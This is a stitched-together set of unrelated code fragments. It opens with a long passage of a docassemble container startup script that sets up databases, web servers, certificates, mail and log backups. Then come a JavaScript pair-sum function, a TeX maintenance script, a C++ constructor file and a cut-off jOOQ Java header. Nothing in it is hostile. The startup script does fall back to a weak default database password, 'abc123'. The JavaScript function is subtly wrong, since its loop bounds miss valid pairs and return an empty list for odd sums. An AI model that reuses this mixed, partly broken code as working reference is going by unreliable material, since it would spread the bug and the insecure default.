grep -q "^$LOCALETOSET" /etc/locale.gen || { echo $LOCALETOSET >> /etc/locale.gen; NEWLOCALE=true; }
done
if [ "$NEWLOCALE" = true ]; then
locale-gen
fi
fi
echo "26" >&2
if [ -n "$PACKAGES" ]; then
for PACKAGE in "${PACKAGES[@]}"; do
apt-get -q -y install $PACKAGE &> /dev/null
done
fi
echo "26.5" >&2
if [ -n "$PYTHONPACKAGES" ]; then
for PACKAGE in "${PYTHONPACKAGES[@]}"; do
su -c "source \"${DA_ACTIVATE}\" && pip install $PACKAGE" www-data
done
fi
echo "27" >&2
if [ "${TIMEZONE:-undefined}" != "undefined" ] && [ -f /usr/share/zoneinfo/$TIMEZONE ]; then
ln -fs /usr/share/zoneinfo/$TIMEZONE /etc/localtime
dpkg-reconfigure -f noninteractive tzdata
fi
echo "28" >&2
if [ "${S3ENABLE:-false}" == "true" ] || [ "${AZUREENABLE:-false}" == "true" ]; then
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.cloud_register \"${DA_CONFIG_FILE}\"" www-data
fi
echo "29" >&2
if pg_isready -q; then
PGRUNNING=true
else
PGRUNNING=false
fi
if [[ $CONTAINERROLE =~ .*:(all|sql):.* ]] && [ "$PGRUNNING" = false ] && [ "$DBTYPE" == "postgresql" ]; then
supervisorctl --serverurl http://localhost:9001 start postgres || exit 1
sleep 4
su -c "while ! pg_isready -q; do sleep 1; done" postgres
roleexists=`su -c "psql -tAc \"SELECT 1 FROM pg_roles WHERE rolname='${DBUSER:-docassemble}'\"" postgres`
if [ -z "$roleexists" ]; then
echo "create role "${DBUSER:-docassemble}" with login password '"${DBPASSWORD:-abc123}"';" | su -c psql postgres || exit 1
fi
if [ "${S3ENABLE:-false}" == "true" ] && [[ $(s4cmd ls s3://${S3BUCKET}/postgres) ]]; then
PGBACKUPDIR=`mktemp -d`
s4cmd dsync "s3://${S3BUCKET}/postgres" "$PGBACKUPDIR"
elif [ "${AZUREENABLE:-false}" == "true" ] && [[ $(python -m docassemble.webapp.list-cloud postgres) ]]; then
echo "There are postgres files on Azure" >&2
PGBACKUPDIR=`mktemp -d`
for the_file in $(python -m docassemble.webapp.list-cloud postgres/); do
echo "Found $the_file on Azure" >&2
if ! [[ $the_file =~ /$ ]]; then
target_file=`basename "${the_file}"`
echo "Copying $the_file to $target_file" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/${the_file}" "$PGBACKUPDIR/${target_file}"
fi
done
else
PGBACKUPDIR="${DA_ROOT}/backup/postgres"
fi
if [ -d "${PGBACKUPDIR}" ]; then
echo "Postgres database backup directory is $PGBACKUPDIR" >&2
cd "$PGBACKUPDIR"
chown -R postgres.postgres "$PGBACKUPDIR"
for db in $( ls ); do
echo "Restoring postgres database $db" >&2
pg_restore -F c -C -c $db | su -c psql postgres
done
if [ "${S3ENABLE:-false}" == "true" ] || [ "${AZUREENABLE:-false}" == "true" ]; then
cd /
rm -rf $PGBACKUPDIR
fi
cd /tmp
fi
dbexists=`su -c "psql -tAc \"SELECT 1 FROM pg_database WHERE datname='${DBNAME:-docassemble}'\"" postgres`
if [ -z "$dbexists" ]; then
echo "create database "${DBNAME:-docassemble}" owner "${DBUSER:-docassemble}" encoding UTF8;" | su -c psql postgres || exit 1
fi
elif [ "$PGRUNNING" = false ] && [ "$DBTYPE" == "postgresql" ]; then
export PGHOST="${DBHOST}"
export PGUSER="${DBUSER}"
export PGPASSWORD="${DBPASSWORD}"
export PGDATABASE="postgres"
while ! pg_isready -q; do sleep 1; done
dbexists=`psql -tAc "SELECT 1 FROM pg_database WHERE datname='${DBNAME:-docassemble}'"`
if [ -z "$dbexists" ]; then
echo "create database "${DBNAME:-docassemble}" owner "${DBUSER:-docassemble}";" | psql
fi
unset PGHOST
unset PGUSER
unset PGPASSWORD
unset PGDATABASE
fi
echo "29.5" >&2
if [ ! -f "${DA_ROOT}/certs/apache.key" ] && [ -f "${DA_ROOT}/certs/apache.key.orig" ]; then
mv "${DA_ROOT}/certs/apache.key.orig" "${DA_ROOT}/certs/apache.key"
fi
if [ ! -f "${DA_ROOT}/certs/apache.crt" ] && [ -f "${DA_ROOT}/certs/apache.crt.orig" ]; then
mv "${DA_ROOT}/certs/apache.crt.orig" "${DA_ROOT}/certs/apache.crt"
fi
if [ ! -f "${DA_ROOT}/certs/apache.ca.pem" ] && [ -f "${DA_ROOT}/certs/apache.ca.pem.orig" ]; then
mv "${DA_ROOT}/certs/apache.ca.pem.orig" "${DA_ROOT}/certs/apache.ca.pem"
fi
if [ ! -f "${DA_ROOT}/certs/nginx.key" ] && [ -f "${DA_ROOT}/certs/nginx.key.orig" ]; then
mv "${DA_ROOT}/certs/nginx.key.orig" "${DA_ROOT}/certs/nginx.key"
fi
if [ ! -f "${DA_ROOT}/certs/nginx.crt" ] && [ -f "${DA_ROOT}/certs/nginx.crt.orig" ]; then
mv "${DA_ROOT}/certs/nginx.crt.orig" "${DA_ROOT}/certs/nginx.crt"
fi
if [ ! -f "${DA_ROOT}/certs/nginx.ca.pem" ] && [ -f "${DA_ROOT}/certs/nginx.ca.pem.orig" ]; then
mv "${DA_ROOT}/certs/nginx.ca.pem.orig" "${DA_ROOT}/certs/nginx.ca.pem"
fi
if [ ! -f "${DA_ROOT}/certs/exim.key" ] && [ -f "${DA_ROOT}/certs/exim.key.orig" ]; then
mv "${DA_ROOT}/certs/exim.key.orig" "${DA_ROOT}/certs/exim.key"
fi
if [ ! -f "${DA_ROOT}/certs/exim.crt" ] && [ -f "${DA_ROOT}/certs/exim.crt.orig" ]; then
mv "${DA_ROOT}/certs/exim.crt.orig" "${DA_ROOT}/certs/exim.crt"
fi
if [ ! -f "${DA_ROOT}/certs/postgresql.key" ] && [ -f "${DA_ROOT}/certs/postgresql.key.orig" ]; then
mv "${DA_ROOT}/certs/postgresql.key.orig" "${DA_ROOT}/certs/postgresql.key"
fi
if [ ! -f "${DA_ROOT}/certs/postgresql.crt" ] && [ -f "${DA_ROOT}/certs/postgresql.crt.orig" ]; then
mv "${DA_ROOT}/certs/postgresql.crt.orig" "${DA_ROOT}/certs/postgresql.crt"
fi
python -m docassemble.webapp.install_certs "${DA_CONFIG_FILE}" || exit 1
echo "30" >&2
if [[ $CONTAINERROLE =~ .*:(all|cron):.* ]]; then
if [ -f /configdata/initial_credentials ]; then
echo "Found initial credentials" >&2
source /configdata/initial_credentials
rm -f /configdata/initial_credentials
fi
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.create_tables \"${DA_CONFIG_FILE}\"" www-data
unset DA_ADMIN_EMAIL
unset DA_ADMIN_PASSWORD
fi
echo "31" >&2
if [ -f /etc/syslog-ng/syslog-ng.conf ] && [ ! -f "${DA_ROOT}/webapp/syslog-ng-orig.conf" ]; then
cp /etc/syslog-ng/syslog-ng.conf "${DA_ROOT}/webapp/syslog-ng-orig.conf"
fi
echo "32" >&2
OTHERLOGSERVER=false
if [[ $CONTAINERROLE =~ .*:(web|celery):.* ]]; then
if [ "${LOGSERVER:-undefined}" != "undefined" ]; then
OTHERLOGSERVER=true
fi
fi
echo "33" >&2
if [[ $CONTAINERROLE =~ .*:(log):.* ]] || [ "${LOGSERVER:-undefined}" == "null" ]; then
OTHERLOGSERVER=false
fi
echo "34" >&2
if [ "$OTHERLOGSERVER" = false ] && [ -f "${LOGDIRECTORY}/docassemble.log" ]; then
chown www-data.www-data "${LOGDIRECTORY}/docassemble.log"
fi
echo "36" >&2
if [[ $CONTAINERROLE =~ .*:(all|redis):.* ]] && [ "$REDISRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start redis
fi
echo "37" >&2
if [ "${DAUPDATEONSTART:-true}" = "true" ] && [ "${DAALLOWUPDATES:-true}" == "true" ]; then
echo "Doing upgrading of packages" >&2
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.update \"${DA_CONFIG_FILE}\" initialize" www-data || exit 1
touch "${DA_ROOT}/webapp/initialized"
fi
if [ "${DAUPDATEONSTART:-true}" = "initial" ] && [ ! -f "${DA_ROOT}/webapp/initialized" ] && [ "${DAALLOWUPDATES:-true}" == "true" ]; then
echo "Doing initial upgrading of packages" >&2
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.update \"${DA_CONFIG_FILE}\" initialize" www-data || exit 1
touch "${DA_ROOT}/webapp/initialized"
fi
echo "38" >&2
if rabbitmqctl status &> /dev/null; then
RABBITMQRUNNING=true
else
RABBITMQRUNNING=false
fi
if [[ $CONTAINERROLE =~ .*:(all|rabbitmq):.* ]] && [ "$RABBITMQRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start rabbitmq
fi
echo "39" >&2
if [[ $CONTAINERROLE =~ .*:(all|celery):.* ]]; then
echo "checking if celery is already running..." >&2
if su -c "source \"${DA_ACTIVATE}\" && timeout 5s celery -A docassemble.webapp.worker status" www-data 2>&1 | grep -q `hostname`; then
echo "celery is running" >&2
CELERYRUNNING=true;
else
echo "celery is not already running" >&2
CELERYRUNNING=false;
fi
else
CELERYRUNNING=false;
fi
echo "40" >&2
if [[ $CONTAINERROLE =~ .*:(all|celery):.* ]] && [ "$CELERYRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start celery
fi
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
function backup_nginx {
if [ "${S3ENABLE:-false}" == "true" ]; then
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
cd /
rm -f /tmp/letsencrypt.tar.gz
if [ -d etc/letsencrypt ]; then
tar -zcf /tmp/letsencrypt.tar.gz etc/letsencrypt
s4cmd -f put /tmp/letsencrypt.tar.gz "s3://${S3BUCKET}/letsencrypt.tar.gz"
rm -f /tmp/letsencrypt.tar.gz
fi
fi
#if [[ $CONTAINERROLE =~ .*:(all):.* ]] || [[ ! $(python -m docassemble.webapp.list-cloud nginx) ]]; then
# s4cmd dsync "/etc/nginx/sites-available" "s3://${S3BUCKET}/nginx"
#fi
elif [ "${AZUREENABLE:-false}" == "true" ]; then
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
cd /
rm -f /tmp/letsencrypt.tar.gz
if [ -d etc/letsencrypt ]; then
tar -zcf /tmp/letsencrypt.tar.gz etc/letsencrypt
echo "Saving lets encrypt" >&2
cmd_retry blob-cmd -f cp /tmp/letsencrypt.tar.gz "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/letsencrypt.tar.gz"
rm -f /tmp/letsencrypt.tar.gz
fi
fi
#if [[ $CONTAINERROLE =~ .*:(all):.* ]] || [[ ! $(python -m docassemble.webapp.list-cloud nginx) ]]; then
# for the_file in $(find /etc/nginx/sites-available/ -type f); do
# target_file=`basename "${the_file}"`
# echo "Saving nginx" >&2
# cmd_retry blob-cmd -f cp "${the_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/nginx/${target_file}"
# done
#fi
else
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
cd /
rm -f "${DA_ROOT}/backup/letsencrypt.tar.gz"
tar -zcf "${DA_ROOT}/backup/letsencrypt.tar.gz" etc/letsencrypt
fi
#rm -rf "${DA_ROOT}/backup/nginx"
#mkdir -p "${DA_ROOT}/backup/nginx"
#rsync -auq /etc/nginx/sites-available/ "${DA_ROOT}/backup/nginx/"
fi
fi
}
echo "41.2" >&2
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]] && [ "$NGINXRUNNING" = false ]; then
if [ "${WWWUID:-none}" != "none" ] && [ "${WWWGID:-none}" != "none" ] && [ `id -u www-data` != $WWWUID ]; then
OLDUID=`id -u www-data`
OLDGID=`id -g www-data`
usermod -o -u $WWWUID www-data
groupmod -o -g $WWWGID www-data
find / -user $OLDUID -exec chown -h www-data {} \;
find / -group $OLDGID -exec chgrp -h www-data {} \;
if [[ $CONTAINERROLE =~ .*:(all|celery):.* ]] && [ "$CELERYRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 stop celery
fi
supervisorctl --serverurl http://localhost:9001 reread
supervisorctl --serverurl http://localhost:9001 update
if [[ $CONTAINERROLE =~ .*:(all|celery):.* ]] && [ "$CELERYRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start celery
fi
fi
echo "41.8" >&2
if [ "${USEHTTPS:-false}" == "true" ]; then
rm -f /etc/nginx/sites-enabled/docassemblehttp
ln -sf /etc/nginx/sites-available/docassemblessl /etc/nginx/sites-enabled/docassemblessl
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
export USE_PYTHON_3=1
if [ -f /etc/letsencrypt/da_using_lets_encrypt ]; then
certbot renew --nginx --cert-name "${DAHOSTNAME}"
else
certbot --nginx --quiet --email "${LETSENCRYPTEMAIL}" --agree-tos --no-redirect -d "${DAHOSTNAME}" && touch /etc/letsencrypt/da_using_lets_encrypt
fi
cd ~-
nginx -s stop &> /dev/null
touch /etc/letsencrypt/da_using_lets_encrypt
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
rm -f /etc/nginx/sites-enabled/docassemblessl
ln -sf /etc/nginx/sites-available/docassemblehttp /etc/nginx/sites-enabled/docassemblehttp
fi
fi
echo "41.9" >&2
backup_nginx
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
supervisorctl --serverurl http://localhost:9001 start websockets
fi
echo "46" >&2
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
supervisorctl --serverurl http://localhost:9001 start uwsgi
fi
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]]; then
if [ "$NGINXRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start nginx
fi
fi
fi
echo "42.9" >&2
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]] && [ "$APACHERUNNING" = false ]; then
rm -f /etc/apache2/ports.conf
fi
function backup_apache {
if [ "${S3ENABLE:-false}" == "true" ]; then
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
cd /
rm -f /tmp/letsencrypt.tar.gz
if [ -d etc/letsencrypt ]; then
tar -zcf /tmp/letsencrypt.tar.gz etc/letsencrypt
s4cmd -f put /tmp/letsencrypt.tar.gz "s3://${S3BUCKET}/letsencrypt.tar.gz"
rm -f /tmp/letsencrypt.tar.gz
fi
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]] || [[ ! $(python -m docassemble.webapp.list-cloud apache) ]]; then
s4cmd dsync "/etc/apache2/sites-available" "s3://${S3BUCKET}/apache"
fi
elif [ "${AZUREENABLE:-false}" == "true" ]; then
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
cd /
rm -f /tmp/letsencrypt.tar.gz
if [ -d etc/letsencrypt ]; then
tar -zcf /tmp/letsencrypt.tar.gz etc/letsencrypt
echo "Saving lets encrypt" >&2
cmd_retry blob-cmd -f cp /tmp/letsencrypt.tar.gz "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/letsencrypt.tar.gz"
rm -f /tmp/letsencrypt.tar.gz
fi
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]] || [[ ! $(python -m docassemble.webapp.list-cloud apache) ]]; then
for the_file in $(find /etc/apache2/sites-available/ -type f); do
target_file=`basename "${the_file}"`
echo "Saving apache" >&2
cmd_retry blob-cmd -f cp "${the_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/apache/${target_file}"
done
fi
else
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
cd /
rm -f "${DA_ROOT}/backup/letsencrypt.tar.gz"
tar -zcf "${DA_ROOT}/backup/letsencrypt.tar.gz" etc/letsencrypt
fi
rm -rf "${DA_ROOT}/backup/apache"
mkdir -p "${DA_ROOT}/backup/apache"
rsync -auq /etc/apache2/sites-available/ "${DA_ROOT}/backup/apache/"
fi
fi
}
echo "43" >&2
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]] && [ "$APACHERUNNING" = false ]; then
echo "Listen 80" > /etc/apache2/ports.conf
if [ "${DAPYTHONMANUAL:-0}" == "0" ]; then
WSGI_VERSION=`apt-cache policy libapache2-mod-wsgi-py3 | grep '^ Installed:' | awk '{print $2}'`
if [ "${WSGI_VERSION}" != '4.6.5-1' ]; then
apt-get -q -y install libapache2-mod-wsgi-py3 &> /dev/null
ln -sf /usr/lib/apache2/modules/mod_wsgi.so-3.6 /usr/lib/apache2/modules/mod_wsgi.so
fi
fi
if [ "${DAPYTHONMANUAL:-0}" == "0" ]; then
a2enmod wsgi &> /dev/null
else
a2dismod wsgi &> /dev/null
fi
if [ "${WWWUID:-none}" != "none" ] && [ "${WWWGID:-none}" != "none" ] && [ `id -u www-data` != $WWWUID ]; then
OLDUID=`id -u www-data`
OLDGID=`id -g www-data`
usermod -o -u $WWWUID www-data
groupmod -o -g $WWWGID www-data
find / -user $OLDUID -exec chown -h www-data {} \;
find / -group $OLDGID -exec chgrp -h www-data {} \;
if [[ $CONTAINERROLE =~ .*:(all|celery):.* ]] && [ "$CELERYRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 stop celery
fi
supervisorctl --serverurl http://localhost:9001 reread
supervisorctl --serverurl http://localhost:9001 update
if [[ $CONTAINERROLE =~ .*:(all|celery):.* ]] && [ "$CELERYRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start celery
fi
fi
if [ "${BEHINDHTTPSLOADBALANCER:-false}" == "true" ]; then
a2enmod remoteip
a2enconf docassemble-behindlb
else
a2dismod remoteip
a2disconf docassemble-behindlb
fi
echo -e "# This file is automatically generated" > /etc/apache2/conf-available/docassemble.conf
if [ "${DAPYTHONMANUAL:-0}" == "3" ]; then
echo -e "LoadModule wsgi_module ${DA_PYTHON:-${DA_ROOT}/${DA_DEFAULT_LOCAL}}/lib/python3.5/site-packages/mod_wsgi/server/mod_wsgi-py35.cpython-35m-x86_64-linux-gnu.so" >> /etc/apache2/conf-available/docassemble.conf
fi
echo -e "WSGIPythonHome ${DA_PYTHON:-${DA_ROOT}/${DA_DEFAULT_LOCAL}}" >> /etc/apache2/conf-available/docassemble.conf
echo -e "Timeout ${DATIMEOUT:-60}\nDefine DAHOSTNAME ${DAHOSTNAME}\nDefine DAPOSTURLROOT ${POSTURLROOT}\nDefine DAWSGIROOT ${WSGIROOT}\nDefine DASERVERADMIN ${SERVERADMIN}\nDefine DAWEBSOCKETSIP ${DAWEBSOCKETSIP}\nDefine DAWEBSOCKETSPORT ${DAWEBSOCKETSPORT}\nDefine DACROSSSITEDOMAINVALUE *" >> /etc/apache2/conf-available/docassemble.conf
if [ "${BEHINDHTTPSLOADBALANCER:-false}" == "true" ]; then
echo "Listen 8081" >> /etc/apache2/ports.conf
a2ensite docassemble-redirect
fi
if [ "${USEHTTPS:-false}" == "true" ]; then
echo "Listen 443" >> /etc/apache2/ports.conf
a2enmod ssl
a2ensite docassemble-ssl
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
export USE_PYTHON_3=1
if [ -f /etc/letsencrypt/da_using_lets_encrypt ]; then
certbot renew --apache --cert-name "${DAHOSTNAME}"
else
certbot --apache --quiet --email "${LETSENCRYPTEMAIL}" --agree-tos --redirect -d "${DAHOSTNAME}" && touch /etc/letsencrypt/da_using_lets_encrypt
fi
cd ~-
/etc/init.d/apache2 stop
touch /etc/letsencrypt/da_using_lets_encrypt
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
a2dismod ssl
a2dissite -q docassemble-ssl &> /dev/null
fi
backup_apache
fi
echo "44" >&2
if [[ $CONTAINERROLE =~ .*:(log):.* ]] && [ "$APACHERUNNING" = false ]; then
echo "Listen 8080" >> /etc/apache2/ports.conf
a2enmod cgid
a2ensite docassemble-log
fi
echo "45" >&2
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
supervisorctl --serverurl http://localhost:9001 start websockets
fi
echo "46" >&2
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]] && [ "$APACHERUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start apache2
fi
fi
echo "47" >&2
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
if [ "${USEHTTPS:-false}" == "false" ]; then
curl -s http://localhost/ > /dev/null
else
curl -s -k https://localhost/ > /dev/null
fi
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
if [ "$APACHERUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 stop apache2
supervisorctl --serverurl http://localhost:9001 start apache2
fi
fi
fi
echo "48" >&2
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.register \"${DA_CONFIG_FILE}\"" www-data
echo "49" >&2
if [ "$CRONRUNNING" = false ]; then
if ! grep -q '^CONTAINERROLE' /etc/crontab; then
bash -c "set | grep -e '^CONTAINERROLE=' -e '^DA_PYTHON=' -e '^DA_CONFIG=' -e '^DA_ROOT=' -e '^DAPYTHONVERSION='; cat /etc/crontab" > /tmp/crontab && cat /tmp/crontab > /etc/crontab && rm -f /tmp/crontab
fi
supervisorctl --serverurl http://localhost:9001 start cron
fi
echo "50" >&2
if [[ $CONTAINERROLE =~ .*:(all|mail):.* && ($DBTYPE = "postgresql" || $DBTYPE = "mysql") ]]; then
if [ "${DBTYPE}" = "postgresql" ]; then
cp "${DA_ROOT}/config/exim4-router-postgresql" /etc/exim4/dbrouter
if [ "${DBHOST:-null}" != "null" ]; then
echo -n 'hide pgsql_servers = '${DBHOST} > /etc/exim4/dbinfo
else
echo -n 'hide pgsql_servers = localhost' > /etc/exim4/dbinfo
fi
if [ "${DBPORT:-null}" != "null" ]; then
echo -n '::'${DBPORT} >> /etc/exim4/dbinfo
fi
echo '/'${DBNAME}'/'${DBUSER}'/'${DBPASSWORD} >> /etc/exim4/dbinfo
fi
if [ "$DBTYPE" = "mysql" ]; then
cp "${DA_ROOT}/config/exim4-router-mysql" /etc/exim4/dbrouter
if [ "${DBHOST:-null}" != "null" ]; then
echo -n 'hide mysql_servers = '${DBHOST} > /etc/exim4/dbinfo
else
echo -n 'hide mysql_servers = localhost' > /etc/exim4/dbinfo
fi
if [ "${DBPORT:-null}" != "null" ]; then
echo -n '::'${DBPORT} >> /etc/exim4/dbinfo
fi
echo '/'${DBNAME}'/'${DBUSER}'/'${DBPASSWORD} >> /etc/exim4/dbinfo
fi
if [ "${DBTYPE}" = "postgresql" ]; then
echo 'DAQUERY = select short from '${DBTABLEPREFIX}"shortener where short='\${quote_pgsql:\$local_part}'" >> /etc/exim4/dbinfo
fi
if [ "${DBTYPE}" = "mysql" ]; then
echo 'DAQUERY = select short from '${DBTABLEPREFIX}"shortener where short='\${quote_mysql:\$local_part}'" >> /etc/exim4/dbinfo
fi
if [ -f /etc/ssl/docassemble/exim.crt ] && [ -f /etc/ssl/docassemble/exim.key ]; then
cp /etc/ssl/docassemble/exim.crt /etc/exim4/exim.crt
cp /etc/ssl/docassemble/exim.key /etc/exim4/exim.key
chown root.Debian-exim /etc/exim4/exim.crt
chown root.Debian-exim /etc/exim4/exim.key
chmod 640 /etc/exim4/exim.crt
chmod 640 /etc/exim4/exim.key
echo 'MAIN_TLS_ENABLE = yes' >> /etc/exim4/dbinfo
elif [[ $CONTAINERROLE =~ .*:(all|web):.* ]] && [ "${USELETSENCRYPT:-false}" == "true" ] && [ -f "/etc/letsencrypt/live/${DAHOSTNAME}/cert.pem" ] && [ -f "/etc/letsencrypt/live/${DAHOSTNAME}/privkey.pem" ]; then
cp "/etc/letsencrypt/live/${DAHOSTNAME}/fullchain.pem" /etc/exim4/exim.crt
cp "/etc/letsencrypt/live/${DAHOSTNAME}/privkey.pem" /etc/exim4/exim.key
chown root.Debian-exim /etc/exim4/exim.crt
chown root.Debian-exim /etc/exim4/exim.key
chmod 640 /etc/exim4/exim.crt
chmod 640 /etc/exim4/exim.key
echo 'MAIN_TLS_ENABLE = yes' >> /etc/exim4/dbinfo
else
echo 'MAIN_TLS_ENABLE = no' >> /etc/exim4/dbinfo
fi
chmod og-rwx /etc/exim4/dbinfo
supervisorctl --serverurl http://localhost:9001 start exim4
fi
echo "51" >&2
if [[ $CONTAINERROLE =~ .*:(log):.* ]] || [ "$OTHERLOGSERVER" = true ]; then
if [ -d /etc/syslog-ng ]; then
if [ "$OTHERLOGSERVER" = true ]; then
cp "${DA_ROOT}/webapp/syslog-ng-docker.conf" /etc/syslog-ng/syslog-ng.conf
cp "${DA_ROOT}/webapp/docassemble-syslog-ng.conf" /etc/syslog-ng/conf.d/docassemble.conf
sleep 5s
else
rm -f /etc/syslog-ng/conf.d/docassemble.conf
cp "${DA_ROOT}/webapp/syslog-ng.conf" /etc/syslog-ng/syslog-ng.conf
fi
supervisorctl --serverurl http://localhost:9001 start syslogng
fi
fi
function deregister {
rm -f "${DA_ROOT}/webapp/ready"
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.deregister \"${DA_CONFIG_FILE}\"" www-data
if [ "${S3ENABLE:-false}" == "true" ] || [ "${AZUREENABLE:-false}" == "true" ]; then
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.cloud_deregister" www-data
fi
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
#backup_apache
if [ "$OTHERLOGSERVER" = false ]; then
rsync -auq /var/log/apache2/ "${LOGDIRECTORY}/" && chown -R www-data.www-data "${LOGDIRECTORY}"
fi
fi
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
#backup_nginx
if [ "$OTHERLOGSERVER" = false ]; then
rsync -auq /var/log/nginx/ "${LOGDIRECTORY}/" && chown -R www-data.www-data "${LOGDIRECTORY}"
fi
fi
fi
if [ "${S3ENABLE:-false}" == "true" ]; then
if [[ $CONTAINERROLE =~ .*:(all|log):.* ]]; then
s4cmd dsync "${DA_ROOT}/log" "s3://${S3BUCKET}/log"
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]]; then
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
s4cmd dsync "/var/log/apache2" "s3://${S3BUCKET}/apachelogs"
fi
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
s4cmd dsync "/var/log/nginx" "s3://${S3BUCKET}/nginxlogs"
fi
fi
elif [ "${AZUREENABLE:-false}" == "true" ]; then
if [[ $CONTAINERROLE =~ .*:(all|log):.* ]]; then
let LOGDIRECTORYLENGTH=${#LOGDIRECTORY}+2
for the_file in $(find "${LOGDIRECTORY}" -type f | cut -c ${LOGDIRECTORYLENGTH}-); do
echo "Saving log file $the_file" >&2
cmd_retry blob-cmd -f cp "${LOGDIRECTORY}/${the_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/log/${the_file}"
done
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]]; then
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
for the_file in $(find /var/log/apache2 -type f | cut -c 18-); do
echo "Saving log file $the_file" >&2
cmd_retry blob-cmd -f cp "/var/log/apache2/${the_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/apachelogs/${the_file}"
done
fi
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
for the_file in $(find /var/log/nginx -type f | cut -c 16-); do
echo "Saving log file $the_file" >&2
cmd_retry blob-cmd -f cp "/var/log/nginx/${the_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/nginxlogs/${the_file}"
done
fi
fi
else
if [[ $CONTAINERROLE =~ .*:(all):.* ]]; then
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
rm -rf "${DA_ROOT}/backup/apachelogs"
mkdir -p "${DA_ROOT}/backup/apachelogs"
rsync -auq /var/log/apache2/ "${DA_ROOT}/backup/apachelogs/"
fi
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
rm -rf "${DA_ROOT}/backup/nginxlogs"
mkdir -p "${DA_ROOT}/backup/nginxlogs"
rsync -auq /var/log/nginx/ "${DA_ROOT}/backup/nginxlogs/"
fi
fi
if [[ $CONTAINERROLE =~ .*:(all|log):.* ]]; then
rm -rf "${DA_ROOT}/backup/log"
rsync -auq "${LOGDIRECTORY}/" "${DA_ROOT}/backup/log/"
fi
if [[ $CONTAINERROLE =~ .*:(all|cron):.* ]]; then
rm -f "${DA_ROOT}/backup/config.yml"
cp "${DA_CONFIG_FILE}" "${DA_ROOT}/backup/config.yml"
rm -rf "${DA_ROOT}/backup/files"
rsync -auq "${DA_ROOT}/files" "${DA_ROOT}/backup/"
fi
fi
echo "finished shutting down initialize" >&2
kill %1
exit 0
}
trap deregister SIGINT SIGTERM
echo "initialize finished" >&2
touch "${DA_ROOT}/webapp/ready"
sleep infinity &
wait %1
|
function findAllPairCombinations(sum) {
const result = [];
for (let i = 0; i <= sum / 2; i++) {
for (let j = i; j <= sum / 2; j++) {
if (i + j === sum) {
result.push([i, j]);
}
}
}
return result;
}
console.log(findAllPairCombinations(3)); |
#!/bin/bash
fmtutil-sys --all
#mtxrun --generate
updmap-sys
|
<reponame>BitPaw/BitFireEngine
#include "ServerListeningThreadInfo.h"
BF::ServerListeningThreadInfo::ServerListeningThreadInfo()
{
ServerSocket = nullptr;
ServerAdress = nullptr;
}
BF::ServerListeningThreadInfo::ServerListeningThreadInfo(IOSocket* serverSocket, Server* server)
{
ServerSocket = serverSocket;
ServerAdress = server;
} |
<reponame>vharsh/cattle2
/*
* This file is generated by jOOQ.
*/
package io.cattle.platform.core.model.tables;
import io.cattle.platform.core.model.CattleTable;
import io.cattle.platform.core.model.Keys;
